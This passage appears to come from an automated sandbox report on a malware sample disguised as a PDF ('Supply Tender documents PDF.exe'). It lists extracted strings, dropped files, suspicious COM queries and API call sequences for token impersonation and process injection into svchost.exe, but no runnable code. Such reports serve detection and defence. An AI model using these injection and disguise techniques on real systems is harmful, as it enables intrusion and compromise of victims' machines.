Source: Supply Tender documents PDF.exe, 00000000.00000000.1147595722.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_0be73b56-f
Source: Supply Tender documents PDF.exe, 00000000.00000003.1158132269.0000000004223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_40e52988-6
Source: Supply Tender documents PDF.exe, 00000000.00000003.1158132269.0000000004223000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_4481fe16-b
Source: mouslingly.exe, 00000003.00000002.1179098575.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_234b3956-8
Source: mouslingly.exe, 00000003.00000002.1179098575.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_12813a4d-0
Source: mouslingly.exe, 00000016.00000002.1318429750.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1cc29bfb-7
Source: mouslingly.exe, 00000016.00000002.1318429750.00000000004B4000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b61d49b3-6
Source: Supply Tender documents PDF.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_26a9fc49-6
Source: Supply Tender documents PDF.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_a6ec296b-f

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Supply Tender documents PDF.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F58140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CreateFileW,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,	0_2_02F58140
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A68140 SetFilePointerEx,_strlen,_strlen,_strlen,CloseHandle,OpenProcessToken,GetCurrentProcess,GetTokenInformation,GetLastError,WriteFile,ReadFile,SetFilePointerEx,GetEnvironmentVariableW,_wcslen,GetTempPathW,wsprintfW,GetTickCount,GetFileSizeEx,CloseHandle,GetTickCount,RtlAdjustPrivilege,NtQuerySystemInformation,RtlInitUnicodeString,RtlEqualUnicodeString,NtOpenThread,NtImpersonateThread,NtOpenThreadTokenEx,NtAdjustPrivilegesToken,NtClose,NtClose,RtlExitUserThread,	3_2_00A68140
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042CBC3 NtClose,	5_2_0042CBC3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372B60 NtClose,LdrInitializeThunk,	5_2_03372B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_03372DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033735C0 NtCreateMutant,LdrInitializeThunk,	5_2_033735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03374340 NtSetContextThread,	5_2_03374340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03374650 NtSuspendThread,	5_2_03374650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372BA0 NtEnumerateValueKey,	5_2_03372BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372B80 NtQueryInformationFile,	5_2_03372B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372BF0 NtAllocateVirtualMemory,	5_2_03372BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372BE0 NtQueryValueKey,	5_2_03372BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372AB0 NtWaitForSingleObject,	5_2_03372AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372AF0 NtWriteFile,	5_2_03372AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372AD0 NtReadFile,	5_2_03372AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372F30 NtCreateSection,	5_2_03372F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372F60 NtCreateProcessEx,	5_2_03372F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372FB0 NtResumeThread,	5_2_03372FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372FA0 NtQuerySection,	5_2_03372FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372F90 NtProtectVirtualMemory,	5_2_03372F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372FE0 NtCreateFile,	5_2_03372FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372E30 NtWriteVirtualMemory,	5_2_03372E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372EA0 NtAdjustPrivilegesToken,	5_2_03372EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372E80 NtReadVirtualMemory,	5_2_03372E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372EE0 NtQueueApcThread,	5_2_03372EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372D30 NtUnmapViewOfSection,	5_2_03372D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372D10 NtMapViewOfSection,	5_2_03372D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372D00 NtSetInformationFile,	5_2_03372D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372DB0 NtEnumerateKey,	5_2_03372DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372DD0 NtDelayExecution,	5_2_03372DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372C00 NtQueryInformationProcess,	5_2_03372C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372C70 NtFreeVirtualMemory,	5_2_03372C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372C60 NtCreateKey,	5_2_03372C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372CA0 NtQueryInformationToken,	5_2_03372CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372CF0 NtOpenProcess,	5_2_03372CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03372CC0 NtQueryVirtualMemory,	5_2_03372CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03373010 NtOpenDirectoryObject,	5_2_03373010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03373090 NtSetValueKey,	5_2_03373090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033739B0 NtGetContextThread,	5_2_033739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03373D10 NtOpenProcessToken,	5_2_03373D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03373D70 NtOpenThread,	5_2_03373D70

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0046A1EF

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00458310

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004651BD

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\5a4aebfaf253d89c.bin			Jump to behavior
Source: C:\Windows\System32\wbengine.exe	File created: C:\Windows\Logs\WindowsBackup

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0040E6A0	0_2_0040E6A0
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0042D975	0_2_0042D975
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0040FCE0	0_2_0040FCE0
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004221C5	0_2_004221C5
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004362D2	0_2_004362D2
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004803DA	0_2_004803DA
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0043242E	0_2_0043242E
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004225FA	0_2_004225FA
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0045E616	0_2_0045E616
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004166E1	0_2_004166E1
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0043878F	0_2_0043878F
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00436844	0_2_00436844
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00480857	0_2_00480857
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00418808	0_2_00418808
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00468889	0_2_00468889
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0042CB21	0_2_0042CB21
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00436DB6	0_2_00436DB6
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00416F9E	0_2_00416F9E
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00413030	0_2_00413030
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0042F1D9	0_2_0042F1D9
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00423187	0_2_00423187
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00401287	0_2_00401287
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00421484	0_2_00421484
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00415520	0_2_00415520
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00427696	0_2_00427696
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00415760	0_2_00415760
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00421978	0_2_00421978
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00521CC8	0_2_00521CC8
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00487DDB	0_2_00487DDB
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00421D90	0_2_00421D90
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0042BDA6	0_2_0042BDA6
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_0040DF00	0_2_0040DF00
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00413FE0	0_2_00413FE0
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00C427B8	0_2_00C427B8
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F562E0	0_2_02F562E0
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F5A350	0_2_02F5A350
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F58140	0_2_02F58140
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F8F080	0_2_02F8F080
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F94766	0_2_02F94766
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F7E570	0_2_02F7E570
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F60A10	0_2_02F60A10
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F60B70	0_2_02F60B70
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F8CB10	0_2_02F8CB10
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F57E70	0_2_02F57E70
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F92F33	0_2_02F92F33
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F84F10	0_2_02F84F10
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F8BD80	0_2_02F8BD80
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_02F82D10	0_2_02F82D10
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5C5B0	1_3_01A5C5B0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5C5B0	1_3_01A5C5B0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A545E0	1_3_01A545E0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A545E0	1_3_01A545E0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A58930	1_3_01A58930
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A58930	1_3_01A58930
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A58D00	1_3_01A58D00
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A58D00	1_3_01A58D00
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5A510	1_3_01A5A510
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5A510	1_3_01A5A510
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A53CC0	1_3_01A53CC0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A53CC0	1_3_01A53CC0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A590D0	1_3_01A590D0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A590D0	1_3_01A590D0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5A840	1_3_01A5A840
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5A840	1_3_01A5A840
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A523E0	1_3_01A523E0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A523E0	1_3_01A523E0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A51B10	1_3_01A51B10
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A51B10	1_3_01A51B10
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A596A0	1_3_01A596A0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A596A0	1_3_01A596A0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5EEC0	1_3_01A5EEC0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5EEC0	1_3_01A5EEC0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5C5B0	1_3_01A5C5B0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5C5B0	1_3_01A5C5B0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A545E0	1_3_01A545E0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A545E0	1_3_01A545E0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A58930	1_3_01A58930
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A58930	1_3_01A58930
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A58D00	1_3_01A58D00
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A58D00	1_3_01A58D00
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5A510	1_3_01A5A510
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5A510	1_3_01A5A510
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A53CC0	1_3_01A53CC0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A53CC0	1_3_01A53CC0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A590D0	1_3_01A590D0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A590D0	1_3_01A590D0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5A840	1_3_01A5A840
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5A840	1_3_01A5A840
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A523E0	1_3_01A523E0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A523E0	1_3_01A523E0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A51B10	1_3_01A51B10
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A51B10	1_3_01A51B10
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A596A0	1_3_01A596A0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A596A0	1_3_01A596A0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5EEC0	1_3_01A5EEC0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_01A5EEC0	1_3_01A5EEC0
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_00660070	1_3_00660070
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_00660070	1_3_00660070
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_00660070	1_3_00660070
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 1_3_00660070	1_3_00660070
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A68140	3_2_00A68140
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A9F080	3_2_00A9F080
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A662E0	3_2_00A662E0
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A70A10	3_2_00A70A10
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A9CB10	3_2_00A9CB10
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A70B70	3_2_00A70B70
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A6A350	3_2_00A6A350
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A9BD80	3_2_00A9BD80
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A92D10	3_2_00A92D10
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A67E70	3_2_00A67E70
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00AA2F33	3_2_00AA2F33
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00A94F10	3_2_00A94F10
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Code function: 3_2_00CFF0C8	3_2_00CFF0C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00418BE3	5_2_00418BE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004028C0	5_2_004028C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042F163	5_2_0042F163
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004031C0	5_2_004031C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004011D0	5_2_004011D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00410430	5_2_00410430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00410433	5_2_00410433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402493	5_2_00402493
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004024A0	5_2_004024A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402D5D	5_2_00402D5D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402D60	5_2_00402D60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00404569	5_2_00404569
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00416DEE	5_2_00416DEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00416DF3	5_2_00416DF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00410653	5_2_00410653
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E629	5_2_0040E629
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E633	5_2_0040E633
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040475E	5_2_0040475E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E77E	5_2_0040E77E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E7CC	5_2_0040E7CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E783	5_2_0040E783
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FA352	5_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_034003E6	5_2_034003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334E3F0	5_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0274	5_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C02C0	5_2_033C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DA118	5_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03330100	5_2_03330100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033C8158	5_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F41A2	5_2_033F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_034001AA	5_2_034001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F81CC	5_2_033F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D2000	5_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340770	5_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03364750	5_2_03364750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333C7C0	5_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335C6E0	5_2_0335C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340535	5_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03400591	5_2_03400591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E4420	5_2_033E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F2446	5_2_033F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EE4F6	5_2_033EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FAB40	5_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F6BD7	5_2_033F6BD7
